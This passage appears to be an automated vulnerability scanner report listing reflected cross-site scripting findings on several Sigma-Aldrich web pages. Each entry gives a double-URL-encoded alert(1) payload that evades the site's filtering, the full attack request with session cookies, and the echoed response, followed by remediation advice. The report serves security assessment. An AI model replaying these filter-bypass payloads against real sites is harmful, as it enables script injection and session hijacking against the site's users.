Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich8f00c";alert(1)//5533200960d/customer-support/customer-service/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.148. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be42d%2522%253balert%25281%2529%252f%252f7beaebf6c6f was submitted in the REST URL parameter 3. This input was echoed as be42d";alert(1)//7beaebf6c6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-supportbe42d%2522%253balert%25281%2529%252f%252f7beaebf6c6f/customer-service/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-supportbe42d";alert(1)//7beaebf6c6f/customer-service/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.149. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d497%2522%253balert%25281%2529%252f%252f5ad6fd6b06e was submitted in the REST URL parameter 4. This input was echoed as 3d497";alert(1)//5ad6fd6b06e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service3d497%2522%253balert%25281%2529%252f%252f5ad6fd6b06e/about-us/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:39 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service3d497";alert(1)//5ad6fd6b06e/about-us/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.150. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 425f7%2522%253balert%25281%2529%252f%252fa910613c465 was submitted in the REST URL parameter 5. This input was echoed as 425f7";alert(1)//a910613c465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/about-us425f7%2522%253balert%25281%2529%252f%252fa910613c465/meetings-and-shows HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/about-us425f7";alert(1)//a910613c465/meetings-and-shows","E404") ;
   </script>
...[SNIP]...

1.151. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 747e7%2522%253balert%25281%2529%252f%252fe17247fe650 was submitted in the REST URL parameter 6. This input was echoed as 747e7";alert(1)//e17247fe650 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows747e7%2522%253balert%25281%2529%252f%252fe17247fe650 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:43 GMT
Content-Length: 28987
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/about-us/meetings-and-shows747e7";alert(1)//e17247fe650","E404") ;
   </script>
...[SNIP]...

1.152. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acfbb%2522%253balert%25281%2529%252f%252f7b1a87dc9b4 was submitted in the REST URL parameter 1. This input was echoed as acfbb";alert(1)//7b1a87dc9b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentacfbb%2522%253balert%25281%2529%252f%252f7b1a87dc9b4/sigma-aldrich/customer-support/customer-service/services/basic-research HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
